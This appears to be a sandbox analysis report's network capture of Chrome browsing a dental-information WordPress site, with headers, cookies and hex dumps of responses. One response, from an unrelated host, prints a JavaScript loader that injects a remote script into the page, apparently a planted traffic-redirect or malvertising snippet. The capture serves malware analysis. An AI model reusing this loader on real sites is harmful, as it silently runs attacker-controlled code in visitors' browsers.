                                                                                                                                      etag: "203-64623ff0-cdcfa88e507037a2;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 515
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:12 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:12 UTC515INData Raw: 62 6f 64 79 20 2e 66 69 6c 74 65 72 2d 68 6f 76 65 72 2d 6e 6f 6e 65 20 69 6d 67 3a 68 6f 76 65 72 2c 0a 2e 66 69 6c 74 65 72 2d 66 65 61 74 75 72 65 64 2d 6f 6e 6c 79 2e 66 69 6c 74 65 72 2d 68 6f 76 65 72 2d 6e 6f 6e 65 20 2e 70 6f 73 74 2d 69 6d 61 67 65 3a 68 6f 76 65 72 2c 0a 2e 66 69 6c 74 65 72 2d 66 65 61 74 75 72 65 64 2d 6f 6e 6c 79 2e 66 69 6c 74 65 72 2d 68 6f 76 65 72 2d 6e 6f 6e 65 20 2e 70 6f 73 74 2d 69 6d 67 3a 68 6f 76 65 72 2c 0a 2e 66 69 6c 74 65 72 2d 66 65 61 74 75 72 65 64 2d 6f 6e 6c 79 2e 66 69 6c 74 65 72 2d 68 6f 76 65 72 2d 6e 6f 6e 65 20 2e 6d 6f 64 75 6c 65 2d 66 65 61 74 75 72 65 2d 69 6d 61 67 65 3a 68 6f 76 65 72 2c 0a 2e 66 69 6c 74 65 72 2d 66 65 61 74 75 72 65 64 2d 6f 6e 6c 79 2e 66 69 6c 74 65 72 2d 68 6f 76 65 72 2d
                                                                                                                                      Data Ascii: body .filter-hover-none img:hover,.filter-featured-only.filter-hover-none .post-image:hover,.filter-featured-only.filter-hover-none .post-img:hover,.filter-featured-only.filter-hover-none .module-feature-image:hover,.filter-featured-only.filter-hover-


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      130192.168.2.164989546.17.248.124437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:12 UTC634OUTGET /browser.php?pixel=1&os=win&browser=chrome&domain=exodontia.info HTTP/1.1
                                                                                                                                      Host: cdnreport.net
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      131192.168.2.1649897153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:12 UTC926OUTGET /lumps-bumps-patches/ HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953650.0.0.0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      132192.168.2.1649902153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:13 UTC607OUTGET /wp-content/uploads/2021/06/shutterstock_1642040905-scaled.jpg HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953650.0.0.0
                                                                                                                                      2024-04-24 10:14:13 UTC586INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:13 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Mon, 15 May 2023 14:21:33 GMT
                                                                                                                                      etag: "59b51-64623fed-2c4ce463ef088f5e;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 367441
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:13 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:13 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff db 00 43 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0e 09 09 08 08 09 12 0d 0d 0a 0e 15 12 16 16 15 12 14 14 17 1a 21 1c 17 18 1f 19 14 14 1d 27 1d 1f 22 23 25 25 25 16 1c 29 2c 28 24 2b 21 24 25 24 ff c0 00 0b 08 05 46 0a 00 01 01 11 00 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 3e 10 00 02 02 01 04 01 04 01 03 04 02 02 01 02 01 0d 01 02 00 11 03 04 12 21 31 41 05 13 22 51 61 06 32 71 14 23 81 91 42 a1 15 b1 52 07 33 62 c1 16 24 d1 e1 72 34 43 53 f0 f1 82 25 ff da 00 08 01 01 00 00 3f 00 fa 46 7c f4 d4 4f 1e 38 81 c7 f2 62 40 b8 0c e8 17 9a e4 c5 32 e6 d8 39 ab f1 11 7c cc 5a a1 31 66 2b df f1 1a 19 16 b8 6b 35 f5 11 7c e7 23 90 0f
                                                                                                                                      Data Ascii: JFIF,,C!'"#%%%),($+!$%$F>!1A"Qa2q#BR3b$r4CS%?F|O8b@29|Z1f+k5|#
                                                                                                                                      2024-04-24 10:14:13 UTC16384INData Raw: bf db 42 07 3c 4f 9c fa 96 56 4d 4b 6e be 7e a6 2e af 52 e5 80 04 91 70 d9 f1 e3 f6 71 92 c0 31 e6 a5 b5 1a 8c 78 b4 e0 ef dd 53 3f 57 ea 6c 40 0a c4 48 6d 5e dc 3f 2e 58 8e e2 99 33 96 b3 c8 13 1b 59 ea 15 90 aa 9d bf 98 8e 4f 50 7b 3f 3b 03 a1 12 c9 ac c8 cf bb c4 06 6c c1 ae 85 93 28 ad f2 00 75 e6 3a ae cd b4 08 d6 3f 4f 6c 88 4b 11 5d 98 ae a3 47 46 87 f8 31 53 85 ac 82 6c 09 29 a7 db fc 18 c6 3d 35 71 63 9e e1 14 6d 14 0d 9f cc 22 ab ee 1d 4b 7f 4a d9 5c 31 ae e6 8e 25 0c 9e d2 0e be a5 94 9c 41 83 55 c9 4d 42 6e 16 bf e6 5d 72 0a ef cc 2a 3b 80 6c f0 79 10 d8 93 23 a5 a9 eb c4 2a 33 bb 02 29 76 c3 bd 93 bf b9 da 75 dc 4b 91 c7 91 1c c5 85 56 9c 35 03 d4 b2 69 d8 b3 12 c3 f1 06 51 70 06 f7 32 d1 30 0c c9 8d ac e5 e0 c1 e4 d5 62 07 7d ee a8 ae a7 5b
                                                                                                                                      Data Ascii: B<OVMKn~.Rpq1xS?Wl@Hm^?.X3YOP{?;l(u:?OlK]GF1Sl)=5qcm"KJ\1%AUMBn]r*;ly#*3)vuKV5iQp20b}[
                                                                                                                                      2024-04-24 10:14:14 UTC16384INData Raw: 11 4c 04 b6 16 c6 dc 8b ff 00 53 27 55 88 26 46 04 f2 7a 89 32 02 76 df 62 2e 31 15 6d b2 19 0a 31 b9 5c cc 88 9b 7e fb 99 9a 8c a0 5a a8 e2 35 e9 aa 3d c5 23 b9 b3 99 d7 69 07 c7 99 9a ce 79 2a c6 bc ca e6 25 85 ef 17 f5 15 4c cf 8f 27 c7 91 18 4c c7 23 82 6e fc c6 f1 ea 48 60 0a df e6 32 18 65 3f 16 fe 67 0c be c2 9a 00 b4 91 a8 5f f9 79 9d 8b 32 fb 9f 12 3f 88 7c ad 8c a8 2c 68 ca 7b aa 12 c3 d8 fc c0 26 a9 57 2d 31 e3 ff 00 70 d8 f5 8a 1c a3 11 b6 19 fd a2 bb d0 d1 f1 10 ca 32 2d 92 6e fc c5 86 a1 d4 15 7b 22 72 ea 1b 1f 80 49 91 8f 2f b9 68 e2 ea 3a 33 01 89 55 47 53 99 37 13 64 03 09 a4 51 65 18 d8 31 f4 d2 0c 4e ac 1a ee 68 60 cc a5 68 9b 37 34 57 46 9a 85 0c bc 19 a3 a7 d0 15 08 54 dd 7d cd ac 58 0a d0 60 02 91 2e f8 ed 49 bb 02 2a f8 43 f2 2e c4
                                                                                                                                      Data Ascii: LS'U&Fz2vb.1m1\~Z5=#iy*%L'L#nH`2e?g_y2?|,h{&W-1p2-n{"rI/h:3UGS7dQe1Nh`h74WFT}X`.I*C.
                                                                                                                                      2024-04-24 10:14:14 UTC16384INData Raw: 49 3f c9 81 c9 92 8a 80 d0 ab 98 06 5d ed 62 33 9b 51 89 14 01 92 c5 75 13 cf a8 5c cb 57 c4 cc d5 eb 15 19 42 9e a2 99 b3 86 60 49 e6 a6 66 52 4e 4e 3b 30 3a 8b 41 4e 2e e2 c5 b1 6d a3 11 cc aa 58 ed 06 be e7 2a 0c 60 1d d7 3b 17 b6 58 a1 c7 77 d9 12 ab a5 50 ec 6c ec 12 d9 b3 63 60 17 12 dd 0e e2 61 41 b1 7c c9 da 00 ba e4 4b 36 31 c5 9e 4c 93 80 a8 dc 4f 10 42 9d b6 ed ee 37 a5 d0 22 fc d8 86 03 c4 26 a1 cf 03 6e d5 fc 4e c1 8d 99 c1 00 f3 d4 6f 0a 8b 62 cb f2 11 cf 4f cc 72 67 db d0 33 d3 69 35 3e db 6c 23 83 29 fa 81 2f 49 c0 1c f7 f7 3c a6 5d ab 8c 59 04 fd 41 86 1b 48 2d c7 d0 90 99 80 c7 c7 83 d4 06 4d 46 f0 42 dd f9 fa 94 0e 31 10 c5 bb f1 05 9b 54 a3 25 b5 1b f1 33 75 5a 9d cd 6b e2 68 7a 5e a2 d3 75 cd 1c 5a 8c 88 03 02 7b e2 e6 de ab 56 d9 3d
                                                                                                                                      Data Ascii: I?]b3Qu\WB`IfRNN;0:AN.mX*`;XwPlc`aA|K61LOB7"&nNobOrg3i5>l#)/I<]YAH-MFB1T%3uZkhz^uZ{V=
                                                                                                                                      2024-04-24 10:14:14 UTC16384INData Raw: e8 c7 b1 e9 db 18 8d cc 78 10 87 48 da 71 6e 41 dc 3b 33 b4 f9 59 7e 1d 8b 91 ac cb 84 69 dc b0 f9 f8 99 58 b3 36 3c ea e7 90 66 96 26 5c 99 45 28 a3 3d 5f a7 61 0f a1 60 17 e5 e2 68 60 f4 ed 56 5c 7b 9d 48 51 f7 3d 07 e9 96 38 c3 e0 70 7f 11 fc 9a 21 97 28 77 04 10 62 de bd e8 ba 6c b8 d3 3b 05 05 7c cf 15 ea 3a 8c 18 15 d8 38 bb ad a2 66 6b 75 69 97 0a 05 14 2a 57 0e 3c 29 b5 b2 fc 49 e6 17 16 a4 62 f5 04 dc df 1f 1c cd 8f 51 d6 a0 01 85 6e af 13 2b 1f a9 64 67 a0 58 01 e6 53 3f ea 4c b8 1b 69 00 83 e4 ca e3 f5 8c 9a 96 dc 72 d2 8f 10 59 fd 5f 16 a0 be 31 90 ab 0e 8c 0e 94 38 5f 74 64 2c 41 fb ee 76 5f 5a d5 e4 ca 31 2b 11 e2 a3 48 33 b1 05 dc ff 00 be 63 1a 7c f8 bd c0 85 79 1e 4c 6b 50 f8 85 af 82 39 11 7c 5a 0c 3a b6 ac 6b 40 47 86 87 16 1c 65 54 06
                                                                                                                                      Data Ascii: xHqnA;3Y~iX6<f&\E(=_a`h`V\{HQ=8p!(wbl;|:8fkui*W<)IbQn+dgXS?LirY_18_td,Av_Z1+H3c|yLkP9|Z:k@GeT
                                                                                                                                      2024-04-24 10:14:14 UTC16384INData Raw: ab 75 0f a7 d3 be a3 59 64 6d a9 e9 f0 e2 38 c2 55 19 bf e9 c5 59 ad 57 91 d9 9a ee 83 1e 12 cc 6e e7 95 f5 62 87 33 6d ec 77 3c 9f aa ea 0e 35 ca a8 38 1f 53 c9 e7 d6 33 d8 17 b4 f7 13 63 93 23 15 54 ae 3f dc 0e f2 49 42 94 c4 54 ef 61 b1 e3 20 8b b8 b8 4c a7 1b 72 6a 46 5c 5b 36 ae e3 b8 cb 0c 85 31 6d ab 7f b8 ce 3d 42 e1 d2 31 c8 bf 26 ea 64 be 75 77 dc 3e e6 f7 a4 e1 5c ce 32 30 b5 a9 ad a8 d4 27 b0 31 b1 50 df f1 99 9a fd 53 a1 c6 8c d6 25 b3 66 f6 c6 22 b4 3f 22 03 d4 b5 28 c1 05 db b7 66 67 ea 32 56 32 17 96 22 a6 06 a7 46 1b 21 35 b8 99 8b a8 d3 e3 c2 18 31 f9 5f 52 d8 b1 62 7c 7b 58 df 13 27 32 32 3b 28 ba 06 13 45 8d ce 40 47 13 50 a8 c2 d6 57 93 d4 06 54 39 98 fc 6a e2 f9 b4 cd 86 df c4 54 b1 03 f9 9c 10 20 dc 4d dc 9d c4 70 0c a9 61 b7 f3 22
                                                                                                                                      Data Ascii: uYdm8UYWnb3mw<58S3c#T?IBTa LrjF\[61m=B1&duw>\20'1PS%f"?"(fg2V2"F!51_Rb|{X'22;(E@GPWT9jT Mpa"
                                                                                                                                      2024-04-24 10:14:14 UTC16384INData Raw: e0 19 e0 bd 55 37 12 c7 e3 e2 61 ea 31 6d c7 f0 71 d7 31 54 0c 47 7d f9 96 5d e3 37 c4 dd 4d 9d 16 a8 32 84 c8 d4 41 ee 7a 3d 37 b4 e8 b9 03 51 03 98 e6 cf 71 06 c6 e0 f7 27 36 2b 55 0b 45 ba 82 c8 a8 00 25 8b 3f 55 15 7c 44 06 be 09 ff 00 a8 b9 c7 4b 60 93 7c 13 2b 93 19 25 40 63 50 89 8c ec 20 1f e6 57 08 75 72 b8 da a7 16 70 08 ba fb 32 a8 ef 8d fe 32 55 99 b2 93 ff 00 70 1a a6 61 96 af 70 80 3a dc 88 c2 c7 03 a1 04 72 e7 dc 59 88 e6 11 72 e5 c8 9c bd d7 71 9d 3e bb 26 0c 64 15 05 47 3c c5 75 7e a0 75 4e 09 5d aa 3e a5 f1 6b d3 16 23 bb 92 07 17 12 c5 98 e6 c8 59 c7 1f 98 3d 59 46 c8 69 f6 d4 5f 6a ba 5b 10 47 93 12 cf 94 72 97 b9 3f 10 2e 31 80 0a 35 ff 00 f8 7e a0 32 95 20 8a e7 ee 2b 97 08 ca df bb 6d 08 37 c0 7d b0 28 5f dc a9 c2 8a a5 0f ee 3c dc
                                                                                                                                      Data Ascii: U7a1mq1TG}]7M2Az=7Qq'6+UE%?U|DK`|+%@cP Wurp22Upap:rYrq>&dG<u~uN]>k#Y=YFi_j[Gr?.15~2 +m7}(_<
                                                                                                                                      2024-04-24 10:14:14 UTC16384INData Raw: e2 0b db 77 1b 4b 50 1e 60 32 6e 3c 0e 87 10 2e 00 35 64 c8 7c 61 4f 26 c7 83 21 f1 d2 ab 07 b3 f5 04 ca e4 73 c8 b9 ce 98 c0 1c f6 20 76 1d 9f 89 42 a0 81 d0 a8 1c 98 08 25 b8 3f 88 bb e3 04 58 00 11 07 91 aa be 3f 88 07 52 49 f1 17 c8 29 80 81 65 05 ae 50 a1 66 a9 05 0a d8 bf e6 46 de 84 82 3c 7d 4e 18 fc 88 c6 9f 40 f9 9e db a9 af a4 f4 d5 ae 16 68 a6 8a 80 15 51 ec 3a 05 48 d6 2d 19 2d c0 8f e9 f4 60 f1 53 53 4b a2 dc c4 b7 ed 11 ec 1a 11 b8 b0 51 b4 4b 9c 5b 51 bc 41 60 c7 97 dd 0c c4 c7 4e e2 eb c6 e3 2a ea c0 94 23 bf fa 9a 7a 1d 00 5d 37 ba 68 9f cc 26 5c a1 42 80 3e 50 7a 84 21 6c 80 3e e2 38 80 76 63 bb 6d 44 b5 e1 5e c7 d0 fb 95 f4 b4 c4 41 2c 2e a6 d6 95 56 b7 2f 15 d4 6b 1b fb af 79 39 a8 5c b9 c1 00 20 20 0f 3f 72 41 0d c2 bd 49 0a 15 c1 39
                                                                                                                                      Data Ascii: wKP`2n<.5d|aO&!s vB%?X?RI)ePfF<}N@hQ:H--`SSKQK[QA`N*#z]7h&\B>Pz!l>8vcmD^A,.V/ky9\ ?rAI9
                                                                                                                                      2024-04-24 10:14:14 UTC16384INData Raw: c5 ea 7b 32 6d 74 dc 07 10 1e a6 c4 67 5d 82 bd cf b9 93 ea 39 db 0b 0c 78 cd 37 9a 8a fa 5a b6 af d5 31 ee 3d 19 eb bf a7 70 e4 76 7a 13 43 43 a3 f6 d7 e5 c9 26 6b 2e 98 38 01 01 b1 2c 70 65 dc 10 83 52 1c 10 85 54 51 3c 40 61 d2 b6 fb 6a a3 09 93 d3 c0 b2 a4 73 e6 50 e2 3b 46 32 bc 8f f9 46 74 b8 76 57 c8 13 1b cb 80 28 0c 0f 27 c0 94 4f 83 ee 2b e2 57 57 a9 3a 8c 5b 42 00 3a 98 d9 f4 ac ea 4f 81 02 be 9e 32 b5 33 71 0d 87 4e 34 ee 02 89 99 fa ab 0e f7 c4 54 73 5c cc 4d 3e 0d ce ab d9 b9 e9 32 69 d7 4f a4 c7 40 02 63 be 9d a5 c8 89 ee 0f dc 79 91 ea 47 2e 56 00 9e a5 31 3b 60 c4 29 3f 77 99 a7 83 1b b8 40 a3 9a e6 07 56 cc 99 bd ba f3 dc 43 d5 b2 3a e3 60 01 1f 1e e7 88 62 72 e5 72 4f 37 52 99 34 2a c1 83 1f 97 62 53 45 8f 2b 66 08 3c 4b 7a 86 20 5f 61
                                                                                                                                      Data Ascii: {2mtg]9x7Z1=pvzCC&k.8,peRTQ<@ajsP;F2FtvW('O+WW:[B:O23qN4Ts\M>2iO@cyG.V1;`)?w@VC:`brrO7R4*bSE+f<Kz _a
                                                                                                                                      2024-04-24 10:14:14 UTC1368INData Raw: a5 77 3b 94 dd c1 66 c2 31 60 60 05 b1 ec cf 1d ea 3f 37 60 01 21 4f 73 3b db 5c b6 7a a9 cd 93 fb 5b 6a 00 7c 41 e3 88 6c 61 1d f9 5a 50 20 b5 5a 64 0d ee 62 36 04 5b 50 f6 8b f7 e6 76 05 24 5f 88 d2 aa a8 21 a8 c9 7c 21 f4 c7 9a 20 c5 71 e0 4e 49 3c 09 1b 54 b7 2d d7 22 1f 49 a7 c7 90 17 ae 4f 53 5f 43 80 a9 04 8a b9 e9 34 48 9a 7a 3b 77 93 dc d1 21 35 38 89 50 54 8f 12 da 5d 29 2b b8 dd 0e a4 e4 43 91 a9 ae 66 7a 9e 99 ce 54 1d 7d 4c 3f 55 d1 66 5c b6 bd d7 89 3e 9e ed 8b 13 23 93 cf 89 e8 74 ea 98 f4 d8 50 f2 18 d9 9b 18 b0 8c 58 ad 47 10 d8 98 9d a8 df 11 f7 2c 46 3d 36 52 c0 db 57 17 13 f5 3d d8 f4 6f a9 db 44 f9 99 5a 4f 50 ce d8 8a 9c 8d b4 f8 8c 62 d2 64 65 df b8 f3 e2 6a 7a 7e 05 c4 d7 54 7e e2 ba a2 d9 75 25 47 36 67 a8 f4 fc 49 8b 4f 8d 07 06
                                                                                                                                      Data Ascii: w;f1``?7`!Os;\z[j|AlaZP Zdb6[Pv$_!|! qNI<T-"IOS_C4Hz;w!58PT])+CfzT}L?Uf\>#tPXG,F=6RW=oDZOPbdejz~T~u%G6gIO


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      133192.168.2.164990331.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:13 UTC523OUTGET /9hFXWz7m HTTP/1.1
                                                                                                                                      Host: debasesingle.life
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:14 UTC767INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:14 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 247
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:14:13 GMT
                                                                                                                                      Set-Cookie: _subid=2vk1oobld9ehs; expires=Sat, 25 May 2024 10:14:14 GMT; path=/
                                                                                                                                      Set-Cookie: 7e4fc=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQ3MTdcIjoxNzEzOTUzNjUzLFwiNDY4NlwiOjE3MTM5NTM2NTMsXCI0Njc4XCI6MTcxMzk1MzY1M30sXCJjYW1wYWlnbnNcIjp7XCIxNDVcIjoxNzEzOTUzNjUzLFwiMjI5XCI6MTcxMzk1MzY1MyxcIjIyOFwiOjE3MTM5NTM2NTN9LFwidGltZVwiOjE3MTM5NTM2NTN9In0.pFlI2CUTLlUyI5r_92-_m61-zheJ8QHPnpY7nZX4qbQ; expires=Fri, 19 Aug 2078 20:28:28 GMT; path=/
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      2024-04-24 10:14:14 UTC247INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 71 2c 66 2c 65 2c 77 2c 6a 29 7b 77 3d 71 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 66 29 3b 6a 3d 71 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 66 29 5b 30 5d 3b 77 2e 61 73 79 6e 63 3d 31 3b 77 2e 73 72 63 3d 65 3b 6a 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 77 2c 6a 29 3b 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 73 74 61 6b 65 2e 6c 69 62 65 72 74 61 72 69 61 6e 63 6f 75 6e 74 65 72 70 6f 69 6e 74 2e 63 6f 6d 2f 2b 36 4e 36 37 59 43 42 47 59 53 66 67 55 44 66 7a 5a 42 57 7a 34 6d 42 51 4d 2b 58 30 52 79 47 69 38 30 4e 6a 4a 2f 46 46 34 65 4a 77 56 69 51 27 29 3b
                                                                                                                                      Data Ascii: ;(function(o,q,f,e,w,j){w=q.createElement(f);j=q.getElementsByTagName(f)[0];w.async=1;w.src=e;j.parentNode.insertBefore(w,j);})(window,document,'script','https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ');


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      134192.168.2.1649904153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:13 UTC932OUTGET /drugs-for-oral-conditions/ HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953650.0.0.0
                                                                                                                                      2024-04-24 10:14:14 UTC703INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      x-powered-by: PHP/7.4.33
                                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                                      link: <https://exodontia.info/wp-json/>; rel="https://api.w.org/"
                                                                                                                                      link: <https://exodontia.info/wp-json/wp/v2/pages/898>; rel="alternate"; type="application/json"
                                                                                                                                      link: <https://exodontia.info/?p=898>; rel=shortlink
                                                                                                                                      server-timing: wp-before-template;dur=46.34
                                                                                                                                      transfer-encoding: chunked
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:14 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
